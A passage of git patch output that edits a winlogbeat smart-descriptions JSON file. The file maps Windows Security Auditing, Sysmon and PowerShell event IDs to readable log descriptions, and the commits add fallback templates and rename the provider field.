"source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4106 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, { "value": "Auditing event on {winlog.computer_name}: {event.action}", "conditions": [ From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:44:03 +0100 Subject: [PATCH 040/150] Small fixes --- .../winlogbeat/_meta/smart-descriptions.json | 51 ------------------- 1 file changed, 51 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index 5eaf6dc64..a3b786729 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1134,12 +1134,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "event.action" } ] }, @@ -1149,15 +1143,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.SubjectUserSid" - }, - { - "field": "event.action" } ] }, @@ -1171,15 +1156,6 @@ { "field": "event.action", "value": "Filtering Platform Connection" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.event_data.SourceAddress" - }, - { - "field": "winlog.event_data.DestAddress" } ] }, @@ -1189,12 +1165,6 @@ { "field": "winlog.provider_guid", "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" - }, - { - "field": "host.hostname" - }, - { - "field": "event.original" } ] }, @@ -1204,12 +1174,6 @@ { "field": "winlog.provider_guid", "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" - }, - { - "field": "winlog.opcode" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1219,9 +1183,6 @@ { "field": "winlog.provider_guid", "value": "{00000000-0000-0000-0000-000000000000}" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1231,12 +1192,6 @@ { "field": "winlog.provider_guid", "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1246,12 +1201,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:58:27 +0100 Subject: [PATCH 041/150] Fixing details in smart description to avoid NULL --- .../winlogbeat/_meta/smart-descriptions.json | 426 ++++++++++++++++++ 1 file changed, 426 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index a3b786729..ee074adf6 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -668,6 +668,158 @@ } ] }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", "relationships": [ @@ -693,6 +845,9 @@ }, { "field": "source.ip" + }, + { + "field":"host.hostname" } ] }, @@ -776,6 +931,26 @@ } ] }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", "relationships": [ @@ -793,6 +968,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" } ] }, @@ -969,6 +1147,191 @@ } ] }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, { "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", "relationships": [ @@ -1011,6 +1374,18 @@ { "field": "event.provider", "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -1148,6 +1523,57 @@ }, { "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:03:25 +0100 Subject: [PATCH 042/150] small fix --- Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index ee074adf6..b3a3257b7 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -16,6 +16,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" } ] }, @@ -42,6 +45,9 @@ "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" }, + { + "field": "action.properties.LogonType" + }, { "field": "source.ip" } From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:10:35 +0100 Subject: [PATCH 043/150] change from event.provider to winlog.provider_name --- .../winlogbeat/_meta/smart-descriptions.json | 130 +++++++++--------- 1 file changed, 65 insertions(+), 65 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b3a3257b7..b720b4ffb 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -14,7 +14,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -42,7 +42,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -68,7 +68,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -88,7 +88,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -113,7 +113,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -136,7 +136,7 @@ "value": 4634 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -156,7 +156,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -176,7 +176,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -200,7 +200,7 @@ "value": 4662 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -220,7 +220,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -240,7 +240,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -285,7 +285,7 @@ "value": 4688 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -305,7 +305,7 @@ "value": 4689 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -325,7 +325,7 @@ "value": 4720 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -345,7 +345,7 @@ "value": 4722 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -365,7 +365,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -389,7 +389,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -413,7 +413,7 @@ "value": 4725 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -433,7 +433,7 @@ "value": 4726 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -453,7 +453,7 @@ "value": 4727 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -473,7 +473,7 @@ "value": 4742 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -493,7 +493,7 @@ "value": 4744 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -513,7 +513,7 @@ "value": 4750 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -533,7 +533,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -553,7 +553,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -577,7 +577,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -597,7 +597,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -621,7 +621,7 @@ "value": 4771 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -641,7 +641,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -665,7 +665,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -694,7 +694,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -722,7 +722,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -745,7 +745,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -770,7 +770,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -798,7 +798,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -821,7 +821,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -846,7 +846,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -872,7 +872,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -892,7 +892,7 @@ "value": 4798 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -912,7 +912,7 @@ "value": 4799 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -932,7 +932,7 @@ "value": 4825 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -952,7 +952,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -972,7 +972,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -995,7 +995,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1015,7 +1015,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1039,7 +1039,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1059,7 +1059,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1083,7 +1083,7 @@ "value": 5156 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1096,7 +1096,7 @@ "value": 4103 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1109,7 +1109,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1122,7 +1122,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1135,7 +1135,7 @@ "value": 4105 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1148,7 +1148,7 @@ "value": 4106 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1183,7 +1183,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1224,7 +1224,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1278,7 +1278,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1327,7 +1327,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1378,7 +1378,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1415,7 +1415,7 @@ "value": 2 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1435,7 +1435,7 @@ "value": 3 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1448,7 +1448,7 @@ "value": 11 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1465,7 +1465,7 @@ "value": "CreateValue" }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1478,7 +1478,7 @@ "value": 13 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1491,7 +1491,7 @@ "value": 16 }, { 